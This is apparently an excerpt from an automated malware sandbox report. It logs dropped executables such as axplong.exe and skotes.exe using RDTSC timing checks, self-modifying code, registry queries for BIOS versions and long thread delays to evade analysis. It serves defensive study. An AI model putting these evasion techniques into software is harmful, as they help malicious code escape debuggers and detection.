Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D8F2 second address: 100D93B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC750FDC8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b add dword ptr [esp], 050AC95Bh 0x00000012 sub dword ptr [ebp+122D1FE5h], edx 0x00000018 mov dword ptr [ebp+122D1C49h], ecx 0x0000001e push 00000003h 0x00000020 mov dword ptr [ebp+122D25BCh], ecx 0x00000026 push 00000000h 0x00000028 mov dx, si 0x0000002b push 00000003h 0x0000002d push FCA902C5h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FC750FDC8F3h 0x0000003b rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D93B second address: 100D950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 102F300 second address: 102F30A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC750FDC8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 102F30A second address: 102F316 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC750B60C2Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 102F316 second address: 102F321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 102F321 second address: 102F327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 102D878 second address: 102D8B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8F7h 0x00000007 jno 00007FC750FDC8E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FC750FDC8F9h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 1000B1A second address: 1000B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC750B60C26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 102DA46 second address: 102DA50 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC750FDC8ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 102DDE1 second address: 102DDE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 102DDE5 second address: 102DDEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 102DDEB second address: 102DDF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 102DF5A second address: 102DF5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 102DF5E second address: 102DF79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FC750B60C32h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 102E418 second address: 102E43C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC750FDC8ECh 0x00000008 jng 00007FC750FDC8E6h 0x0000000e jmp 00007FC750FDC8EDh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 102E43C second address: 102E441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 102F1A3 second address: 102F1A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 102F1A7 second address: 102F1AC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 103127B second address: 103127F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 103127F second address: 1031285 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 10317B7 second address: 10317C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov eax, dword ptr [eax] 0x00000007 jo 00007FC750FDC8F4h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 10317C7 second address: 10317CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 10317CD second address: 10317DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FC750FDC8E6h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 10317DF second address: 10317E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 1030079 second address: 103007E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 103007E second address: 1030094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC750B60C2Ah 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 10307F6 second address: 10307FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 1031A27 second address: 1031A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 1031A2B second address: 1031A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 1033E0E second address: 1033E40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC750B60C30h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push edx 0x00000010 pop edx 0x00000011 jmp 00007FC750B60C35h 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 1033E40 second address: 1033E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 1033E46 second address: 1033E4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 1033E4A second address: 1033E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FC750FDC8E6h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 1039CA7 second address: 1039CAD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 103A0FC second address: 103A100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 103A494 second address: 103A4B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C38h 0x00000007 push ecx 0x00000008 jnc 00007FC750B60C26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 103A4B7 second address: 103A4DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FC750FDC8EBh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC750FDC8F2h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 103A4DE second address: 103A4F2 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC750B60C26h 0x00000008 jg 00007FC750B60C26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 103A4F2 second address: 103A4F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 103A679 second address: 103A69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007FC750B60C39h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 103A69D second address: 103A6A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 103A6A5 second address: 103A6AE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 103AF86 second address: 103AF8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 103AF8A second address: 103AF90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 103B3A7 second address: 103B3AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 103B3AD second address: 103B3B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 103B3B1 second address: 103B3C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FC750FDC8E6h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 103B3C4 second address: 103B3CE instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC750B60C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 103B46B second address: 103B46F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 103B46F second address: 103B48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC750B60C34h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 103B71F second address: 103B725 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 103B725 second address: 103B72B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Special instruction interceptor: First address: 978A60 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Special instruction interceptor: First address: 97896B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Special instruction interceptor: First address: B193AD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Special instruction interceptor: First address: BA16C6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Special instruction interceptor: First address: E8FECE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Special instruction interceptor: First address: 1031348 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Special instruction interceptor: First address: 102FE89 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Special instruction interceptor: First address: 9EED6D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Special instruction interceptor: First address: 9EEE18 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Special instruction interceptor: First address: 9EED90 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Special instruction interceptor: First address: C1EE4F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: EAED6D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: EAEE18 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: EAED90 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 10DEE4F instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\FIJECAEHJJ.exe	Special instruction interceptor: First address: 81ED6D instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\FIJECAEHJJ.exe	Special instruction interceptor: First address: 81EE18 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\FIJECAEHJJ.exe	Special instruction interceptor: First address: 81ED90 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\FIJECAEHJJ.exe	Special instruction interceptor: First address: A4EE4F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Special instruction interceptor: First address: 117D819 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Special instruction interceptor: First address: FDC6A6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Special instruction interceptor: First address: 1186579 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Special instruction interceptor: First address: 1209C39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 103D819 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: E9C6A6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 1046579 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 10C9C39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Special instruction interceptor: First address: A27A29 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Special instruction interceptor: First address: BF2BD4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Special instruction interceptor: First address: C5976C instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Memory allocated: 1C594390000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Memory allocated: 1C5ADC00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Memory allocated: 2E30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Memory allocated: 3030000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Memory allocated: 5030000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 599760
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 599641
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 599526
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 599406
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 599294
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 599172
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 599062
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 598953
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 598844
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 598719
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 598608
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 598485
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 598360
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 598235
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 598122
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 598000
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 597890
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 597781
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 597672
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 597563
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 597438
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 597310
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 597188
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 597063
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 596949
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 596828
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 596718
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 596607
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 596375
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 596266
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 596145
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 596016
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 595906
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 595797
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 595687
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 595578
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 595468
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 595358
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 595249
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 595140
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 595031
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 594921
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 594811
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 594692
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 594575
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 594446
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 594326
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 594203
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 594092
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 593969

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Window / User API: threadDelayed 1190	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Window / User API: threadDelayed 1166	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Window / User API: threadDelayed 1261	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Window / User API: threadDelayed 1176	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Window / User API: threadDelayed 1302	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Window / User API: threadDelayed 1284	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Window / User API: threadDelayed 1246	Jump to behavior
